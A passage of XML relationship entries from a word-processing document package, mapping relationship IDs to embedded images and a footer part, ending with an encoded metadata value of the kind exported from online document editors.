Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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9.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35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byiCCq4RG84tCpFp2asFpk6VQ==">CgMxLjAyDmgubGFiNXljNms3aXpoMg1oLjdjcTl4ODJicHNqMg5oLjF5ZWNxeWZ3czY5dDIOaC50aGszY2xvcTVlODAyDmgueThua2l3aGR3MDZ6Mg5oLmZoaHYwNHkyb3JtaDgAciExak5KVVhkOVVVZDFzMFpPWWx1SkE2Qi05Mlc0N2pJQ04=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